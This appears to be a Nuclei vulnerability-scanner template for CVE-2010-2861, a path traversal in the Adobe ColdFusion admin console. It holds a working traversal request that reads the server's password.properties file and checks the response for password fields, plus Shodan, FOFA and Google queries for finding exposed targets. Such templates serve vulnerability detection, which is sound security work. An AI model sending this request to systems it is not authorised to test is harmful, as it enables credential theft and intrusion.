57 lines
2.3 KiB
YAML
57 lines
2.3 KiB
YAML
id: CVE-2010-2861
|
|
|
|
info:
|
|
name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
|
|
author: pikpikcu
|
|
severity: high
|
|
description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
|
|
impact: |
|
|
This vulnerability can lead to unauthorized access to sensitive information and potential compromise of the affected system.
|
|
remediation: Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
|
|
- http://www.adobe.com/support/security/bulletins/apsb10-18.html
|
|
- http://securityreason.com/securityalert/8148
|
|
- http://securityreason.com/securityalert/8137
|
|
- http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2010-2861
|
|
cwe-id: CWE-22
|
|
epss-score: 0.97078
|
|
epss-percentile: 0.9977
|
|
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: adobe
|
|
product: coldfusion
|
|
shodan-query:
|
|
- http.component:"Adobe ColdFusion"
|
|
- http.component:"adobe coldfusion"
|
|
- http.title:"coldfusion administrator login"
|
|
- cpe:"cpe:2.3:a:adobe:coldfusion"
|
|
fofa-query:
|
|
- title="coldfusion administrator login"
|
|
- app="adobe-coldfusion"
|
|
google-query: intitle:"coldfusion administrator login"
|
|
tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "rdspassword="
|
|
- "encrypted="
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502210095d36bc58cabf1166f9a2b788011d6fbc46b38501ea467e227180c4dd1b8b36702203532cec78f34e9a2b01a20cd8f897222e5be1e58dc91a5551005ab1515aa21bc:922c64590222798bb761d5b6d8e72950 |